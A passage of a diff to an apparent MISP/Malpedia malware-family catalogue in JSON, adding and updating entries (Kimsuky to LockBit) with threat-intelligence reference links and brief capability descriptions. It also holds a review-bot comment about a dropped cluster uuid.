+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat",
+ "https://www.reuters.com/article/us-usa-election-cyber-louisiana-exclusiv/exclusive-national-guard-called-in-to-thwart-cyberattack-in-louisiana-weeks-before-election-idUSKBN27823F"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "61edd17b-322d-45dc-a6a0-31c13ec2338e",
+ "value": "KimJongRat"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky",
+ "https://blog.prevailion.com/2019/09/autumn-aperture-report.html",
+ "https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware",
+ "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://blog.alyac.co.kr/2347",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "860643d6-5693-4e4e-ad1f-56c49faa10a7",
+ "value": "Kimsuky"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins",
 "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
- "https://www.youtube.com/watch?v=C-dEOt0GzSE",
 "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/",
"https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html", "https://github.com/nyx0/KINS" @@ -10378,14 +19299,44 @@ "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", "value": "KINS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6c585194-96d3-463d-ac21-aa942439cc26", + "value": "KIVARS" + }, + { + "description": "Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring", + "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "03a4eb90-8d88-49c7-a973-2201115ea5a8", + "value": "Klackring" + }, { "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer", "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ - "Joglog" + "Joglog", + "Parasite" ], "type": [] }, 
@@ -10406,13 +19357,34 @@
 "uuid": "70459959-5a20-482e-b714-2733f5ff310e",
 "value": "KLRD"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot",
+ "https://twitter.com/malwrhunterteam/status/1345313324825780226"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0479b7cd-982e-430e-a96e-338aec8ae3cf",
+ "value": "Knot Ransomware"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://blog.tofile.dev/2020/11/28/koadic_jarm.html",
+ "http://www.secureworks.com/research/threat-profiles/cobalt-ulster",
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://github.com/zerosum0x0/koadic"
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf",
+ "https://github.com/zerosum0x0/koadic",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-ulster"
 ],
 "synonyms": [],
 "type": []
@@ -10443,21 +19415,27 @@
 "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99",
 "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx"
 ],
- "synonyms": [],
+ "synonyms": [
+ "Splinter RAT"
+ ],
 "type": []
 },
 "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06",
 "value": "KOMPROGO"
 },
 {
- "description": "",
+ "description": "Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni",
 "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
+ "https://blog.alyac.co.kr/2474",
+ "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-227a",
 "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant",
- "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
- "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html"
+ "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
+ "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/"
 ],
 "synonyms": [],
 "type": []
@@ -10482,11 +19460,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia",
+ "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf",
 "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
- "https://camal.coseinc.com/publish/2013Bisonal.pdf",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
 "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit",
- "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf"
+ "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
+ "https://asec.ahnlab.com/1298",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-huntley",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
+ "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment"
 ],
 "synonyms": [
 "Bisonal"
@@ -10501,10 +19490,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter",
- "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf",
+ "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update",
 "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
 "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless"
+ "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless",
+ "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/"
 ],
 "synonyms": [],
 "type": []
@@ -10517,9 +19511,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer",
- "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/"
+ "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware",
+ "https://isc.sans.edu/diary/26010",
+ "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/",
+ "https://isc.sans.edu/diary/25934",
+ "https://news.drweb.com/show/?i=13242&lng=en",
+ "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/",
+ "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md"
+ ],
+ "synonyms": [
+ "Khalesi",
+ "Kpot"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d",
@@ -10548,7 +19555,6 @@
 "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html",
 "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
 "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan",
- "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf",
 "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/"
 ],
 "synonyms": [
@@ -10563,8 +19569,7 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader",
- "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader"
 ],
 "synonyms": [],
 "type": []
@@ -10577,17 +19582,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
+ "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
+ "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf",
 "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
- "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
+ "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses",
 "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
- "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
 "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
- "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
- "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
- "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
+ "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
+ "https://twitter.com/3xp0rtblog/status/1294157781415743488",
 "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/"
 ],
 "synonyms": [
@@ -10598,11 +19605,26 @@
 "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17",
 "value": "Kronos"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kryptocibule",
+ "https://www.welivesecurity.com/2020/09/02/kryptocibule-multitasking-multicurrency-cryptostealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8039c56c-3be1-4344-81cf-6c21b06bbaa6",
+ "value": "KryptoCibule"
+ },
 {
 "description": "A keylogger used by Turla.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/",
 "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/"
 ],
 "synonyms": [],
@@ -10670,8 +19692,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
- "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
- "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/"
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat",
+ "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/",
+ "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
+ "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/",
+ "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html",
+ "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
 ],
 "synonyms": [],
 "type": []
@@ -10683,15 +19710,35 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert",
- "http://adelmas.com/blog/longhorn.php",
- "https://www.youtube.com/watch?v=jeLd-gw2bWo",
- "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
- "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer",
+ "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html",
+ "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/",
+ "https://twitter.com/luc4m/status/1276477397102145538",
+ "https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/"
 ],
 "synonyms": [],
 "type": []
 },
+ "uuid": "62f1846f-3026-4824-b739-8f9ae5e9c8bb",
+ "value": "LALALA Stealer"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert",
+ "https://www.youtube.com/watch?v=jeLd-gw2bWo",
+ "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/",
+ "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
+ "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ ],
+ "synonyms": [
+ "Plexor"
+ ],
+ "type": []
+ },
 "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d",
 "value": "Lambert"
 },
@@ -10729,17 +19776,14 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus",
- "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
- "https://twitter.com/PhysicalDrive0/status/828915536268492800",
- "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html",
- "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo",
+ "https://seclists.org/snort/2019/q3/343"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": "eead20f5-6a30-4700-8d14-cfb2d42eaff0",
- "value": "Lazarus (Windows)"
+ "uuid": "e1958a69-49c3-43a2-ba80-6e5cd5bbcd13",
+ "value": "Laturo Stealer"
 },
 {
 "description": "",
@@ -10760,6 +19804,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat",
+ "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
 "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/"
 ],
 "synonyms": [],
@@ -10768,6 +19813,32 @@
 "uuid": "454db469-724a-4084-873c-906abf91d0d5",
 "value": "LazyCat"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot",
+ "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "23dd327e-5d1d-4b75-993e-5d79d9fc0a70",
+ "value": "LCPDot"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall",
+ "https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "526add8e-ed78-4e8e-8d4c-152570fe566e",
+ "value": "Leakthemall Ransomware"
+ },
 {
 "description": "",
 "meta": {
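Review bot: The first hunk rewrites the `"Lazarus (Windows)"` element in place, so the cluster element with uuid `eead20f5-6a30-4700-8d14-cfb2d42eaff0` disappears from this file entirely while the new Laturo Stealer element takes its slot under a fresh uuid. Galaxy uuids are the stable handle that other clusters and already-synchronised MISP instances point at, so silently dropping one is likely to leave dangling references; if upstream really retired the family, it would be safer to keep the element (with its refs trimmed and a note that it is superseded) or at least to call out the removal in the commit message, which currently only says "update to latest". A cheap guard for the generator script would be to diff the set of uuids between the old and new file and fail, or print a warning, when any uuid from the old file is missing in the new one.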
@@ -10786,7 +19857,6 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia",
- "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf",
 "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html",
 "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html"
 ],
@@ -10805,7 +19875,6 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic",
 "http://www.malware-traffic-analysis.net/2017/11/02/index.html",
 "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
- "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/",
 "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/"
 ],
 "synonyms": [],
@@ -10814,14 +19883,107 @@
 "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f",
 "value": "Lethic"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc",
+ "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ed825d46-be1e-4d36-b828-1b85274773dd",
+ "value": "Liderc"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://securelist.com/apt-trends-report-q2-2018/86487/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
+ "https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/"
+ ],
+ "synonyms": [
+ "NETTRANS",
+ "XTRANS"
+ ],
+ "type": []
+ },
+ "uuid": "96b0b8fa-79b6-4519-a794-f6f325f96fd7",
+ "value": "LightNeuron"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac",
+ "https://securelist.com/atm-infector/74772/",
+ "http://atm.cybercrime-tracker.net/index.php"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7d328c7b-7dc8-4891-bbd1-a05dedc8bac4",
+ "value": "Ligsterac"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/",
+ "https://github.com/werkamsus/Lilith"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c443dc36-f439-46d8-8ce7-07d3532a412b",
+ "value": "Lilith"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limedownloader",
+ "https://github.com/NYAN-x-CAT/Lime-Downloader"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a70436b1-559d-48af-836f-f46074cd8ef3",
+ "value": "limedownloader"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer",
+ "https://github.com/NYAN-x-CAT/Lime-Miner"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3819bc21-8c15-48ee-8e68-ee2a0c5f82a7",
+ "value": "limeminer"
+ },
 {
 "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat",
 "https://www.youtube.com/watch?v=x-g-ZLeX8GM",
+ "https://github.com/NYAN-x-CAT/Lime-RAT/",
+ "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
 "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/",
- "https://github.com/NYAN-x-CAT/Lime-RAT/"
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://lab52.io/blog/apt-c-36-recent-activity-analysis/"
 ],
 "synonyms": [],
 "type": []
@@ -10841,12 +20003,26 @@
 "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b",
 "value": "Limitail"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr",
+ "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9a66df8d-ce65-49d6-a648-c1a5ea58cbc2",
+ "value": "LinseningSvr"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
 ],
 "synonyms": [],
 "type": []
@@ -10854,12 +20030,27 @@
 "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac",
 "value": "Listrix"
 },
+ {
+ "description": "According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. \r\nESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke",
+ "https://norfolkinfosec.com/looking-back-at-liteduke/",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ae7352bd-86e9-455d-bdc3-0567886a8392",
+ "value": "LiteDuke"
+ },
 {
 "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp",
 "https://github.com/zettabithf/LiteHTTP",
+ "https://viriback.com/recent-litehttp-activities-and-iocs/",
 "https://malware.news/t/recent-litehttp-activities-and-iocs/21053"
 ],
 "synonyms": [],
@@ -10870,16 +20061,54 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md",
+ "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
+ "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
